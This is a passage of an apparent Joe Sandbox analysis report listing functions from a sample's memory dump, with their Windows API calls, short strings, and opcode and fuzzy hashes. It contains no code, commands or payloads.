                                                                                          Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HH$HH
                                                                                          • API String ID: 0-1787419579
                                                                                          • Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                          • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                          • Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                          • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                          Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoItemMenu_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 2223754486-4108050209
                                                                                          • Opcode ID: 60781951bb834b78e0167a3e9afe01c70176745dc522d898366d6ad0e6242f51
                                                                                          • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                          • Opcode Fuzzy Hash: 60781951bb834b78e0167a3e9afe01c70176745dc522d898366d6ad0e6242f51
                                                                                          • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                          Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: '
                                                                                          • API String ID: 3850602802-1997036262
                                                                                          • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                          • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                          • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                          • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                          Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                          • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                          • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                          • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                          Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: Combobox
                                                                                          • API String ID: 3850602802-2096851135
                                                                                          • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                          • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                          • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                          • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                          Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                          • String ID: edit
                                                                                          • API String ID: 2978978980-2167791130
                                                                                          • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                          • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                          • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                          • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                          Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                          • String ID: @
                                                                                          • API String ID: 2783356886-2766056989
                                                                                          • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                          • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                          • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                          • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                          Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: htonsinet_addr
                                                                                          • String ID: 255.255.255.255
                                                                                          • API String ID: 3832099526-2422070025
                                                                                          • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                          • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                          • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                          • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                          Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 455545452-1403004172
                                                                                          • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                          • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                          • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                          • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                          Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: InternetOpen
                                                                                          • String ID: <local>
                                                                                          • API String ID: 2038078732-4266983199
                                                                                          • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                          • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                          • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                          • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                          Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 455545452-1403004172
                                                                                          • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                          • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                          • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                          • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                          Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 455545452-1403004172
                                                                                          • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                          • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                          • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                          • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                          Function 00461774 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmp
                                                                                          • String ID: ,$UTF8)
                                                                                          • API String ID: 909875538-2632631837
                                                                                          • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                          • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                                          • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                          • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                                          Function 00461772 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmp
                                                                                          • String ID: ,$UTF8)
                                                                                          • API String ID: 909875538-2632631837
                                                                                          • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                          • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                                          • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                          • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                                          Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • wsprintfW.USER32 ref: 004560E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_mallocwsprintf
                                                                                          • String ID: %d/%02d/%02d
                                                                                          • API String ID: 1262938277-328681919
                                                                                          • Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                          • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                          • Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                          • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                          Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                            • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 529655941-2988720461
                                                                                          • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                          • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                          • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                          • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                          Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                          • PostMessageW.USER32(00000000), ref: 00442247
                                                                                            • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                          • String ID: Shell_TrayWnd
